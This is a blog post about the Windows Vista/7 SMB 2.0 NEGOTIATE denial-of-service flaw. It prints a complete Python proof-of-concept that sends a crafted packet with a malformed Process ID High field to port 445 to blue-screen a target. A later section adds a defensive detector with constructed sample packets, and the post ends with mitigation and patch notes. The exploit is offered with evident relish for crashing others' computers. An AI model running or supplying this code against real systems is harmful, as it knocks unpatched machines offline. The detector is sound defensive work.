Remember the good old days when you could teardrop someone running Windows 3.1, Windows 95 or Windows NT and send a BSOD to their computer? Well, I do. Now, for a limited time only, we can relive that experience once again, until Microsoft releases a security patch. This affects all Windows Vista and Windows 7 machines, and possibly Windows Server 2008 and Windows Server 2008 R2. Let’s hope they release a security patch before Windows 7 officially launches.
Here’s the proof of concept. I’m going to keep a copy here just in case.
Smb-Bsod.py:
#!/usr/bin/python
# When SMB 2.0 receives a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA
from socket import socket
from time import sleep
host = "IP_ADDR", 445
buff = (
    b"\x00\x00\x00\x90" # Begin SMB header: Session message
    b"\xff\x53\x4d\x42" # Server Component: SMB
    b"\x72\x00\x00\x00" # Negotiate Protocol
    b"\x00\x18\x53\xc8" # Last status byte, Flags 0x18, Flags2 0xc853
    b"\x00\x26"         # Process ID High: --> normal value should be b"\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
    b"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
    b"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
    b"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
    b"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
    b"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
    b"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
    b"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
    b"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
    b"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
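As an added example (mine, not from the original post), here is a small detector that parses a captured SMB negotiate request on port 445 and flags the non-zero Process ID High field the PoC above relies on; the two sample packets are constructed inline with a single dialect and are not taken from a real capture.

```python
import struct

SMB_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72

def check_smb_negotiate(payload):
    """Parse one raw TCP payload (NetBIOS session message + SMB header).

    Returns None if it is not an SMB session message, otherwise a dict of
    header fields plus 'suspicious', which is True for a NEGOTIATE request
    whose Process ID High field is non-zero (the trigger used above)."""
    if len(payload) < 4 + 32:
        return None
    # NetBIOS session service: 1 byte message type (0x00 = session message),
    # 3 byte big-endian length of the SMB message that follows
    nb_type = payload[0]
    nb_len = int.from_bytes(payload[1:4], "big")
    smb = payload[4:]
    if nb_type != 0x00 or smb[:4] != SMB_MAGIC:
        return None
    # SMB header layout: magic(4) command(1) status(4) flags(1) flags2(2)
    # pid_high(2) signature(8) reserved(2) tid(2) pid(2) uid(2) mid(2)
    cmd, status, flags, flags2, pid_high = struct.unpack("<BIBHH", smb[4:14])
    tid, pid, uid, mid = struct.unpack("<HHHH", smb[24:32])
    return {
        "command": cmd, "flags2": flags2, "pid_high": pid_high, "pid": pid,
        "length_ok": nb_len == len(smb),
        "suspicious": cmd == SMB_COM_NEGOTIATE and pid_high != 0,
    }

def _sample(pid_high):
    """Constructed sample capture (not from a real host): a minimal SMB
    NEGOTIATE request offering a single dialect, with the given PID High."""
    hdr = (SMB_MAGIC + b"\x72" + b"\x00" * 4 + b"\x18" + b"\x53\xc8" + pid_high
           + b"\x00" * 8 + b"\x00\x00" + b"\xff\xff" + b"\xff\xfe" + b"\x00" * 4)
    body = b"\x00" + b"\x0c\x00" + b"\x02NT LM 0.12\x00"  # wordcount 0, bytecount 12
    smb = hdr + body
    return b"\x00" + len(smb).to_bytes(3, "big") + smb

SAMPLE_BENIGN = _sample(b"\x00\x00")   # normal client: PID High = 0
SAMPLE_PIDHIGH = _sample(b"\x00\x26")  # PID High as in the PoC above

if __name__ == "__main__":
    for name, pkt in (("benign", SAMPLE_BENIGN), ("pid_high", SAMPLE_PIDHIGH)):
        print(name, check_smb_negotiate(pkt))
```

The same check can be dropped into a packet-capture loop or an IDS preprocessor: any client negotiate with a non-zero Process ID High is worth an alert on hosts that are still unpatched.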
To keep your computer from BSODing for now, try disabling SMB 2.0. We might even see some script kiddie come up with a simple teardrop application to BSOD your computer.
Ah! The good old days again.
== Update ==
Windows 7 RTM and Windows Server 2008 R2 are already patched and fixed. This exploit only works on Windows Vista, Windows Server 2008 and Windows 7 RC.
Original Post: Microsoft Security Advisory 975497 Released
== End Update ==
Original Post: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.